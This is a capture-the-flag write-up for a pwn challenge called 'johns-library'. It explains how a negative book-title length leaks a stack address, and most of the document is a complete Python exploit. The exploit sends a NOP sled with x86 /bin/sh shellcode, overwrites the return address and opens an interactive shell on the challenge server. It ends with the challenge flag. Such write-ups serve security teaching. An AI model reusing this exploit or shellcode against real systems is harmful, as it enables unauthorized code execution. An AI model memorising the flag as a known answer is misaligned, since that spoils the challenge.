johns-library

Abstract

Category: pwn
Points: 150

Welcome to the jungle library mate! Try to escape!!

 r - read from library
 a - add element
 u - exit
a
Hey mate! Insert how long is the book title:
1
apple

 r - read from library
 a - add element
 u - exit
r
Insert the index of the book you want to read: 0
apple

There are three options 

 r - read from library
 a - add element
 u - exit
  • r - read from library input number and return the len[input] buffer information
  • a - add element add element to buffer and check previous len and input sum not greater than 1024 else exit(-1)
  • u - exit return

Details

The main point is expose the stack address
Due to strings contrain we can't direct expose the ebp address on the stack
we can only expose the address on the esp ( when function call program put argument on the esp, so we can know the buffer address )
After expose buffer address, overwritten the return address by buffer address and exit.
We can execute our shellcode

$cat /home/ctf/flag

Exploit

import struct
from socket import *
import telnetlib
import time
import binascii

ip = "library.polictf.it"
port = 80
soc = socket(AF_INET,SOCK_STREAM)
soc.connect((ip,port))

shellcode="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
recvbuff=soc.recv(4096)
print recvbuff
recvbuff=soc.recv(4096)
print recvbuff

payload = "a"
print payload
soc.send(payload)
recvbuff=soc.recv(4096)
print recvbuff

payload = "-28 "
print payload
soc.send(payload)

payload = "a"*10+"\n"
print payload
soc.send(payload)
recvbuff=soc.recv(4096)
print recvbuff

payload = "r"
print payload
soc.send(payload)
recvbuff=soc.recv(4096)
print recvbuff

payload = "1\n"
print payload
soc.send(payload)

recvbuff=soc.recv(4096)
print recvbuff
address= recvbuff[0:4]
print recvbuff[0:4].encode('hex')
recvbuff=soc.recv(4096)
print recvbuff

payload = "a"
print payload
soc.send(payload)
recvbuff=soc.recv(4096)
print recvbuff

payload = "1\n"
print payload
soc.send(payload)

payload = "\x90"*900+shellcode+"a"*7+"a"*130
payload +=address*3+"\n"
print payload
soc.send(payload)
recvbuff=soc.recv(4096)
print recvbuff

t = telnetlib.Telnet()
t.sock = soc
t.interact()

Flag

flag{John_should_read_a_real_book_on_s3cur3_pr0gr4mm1ng}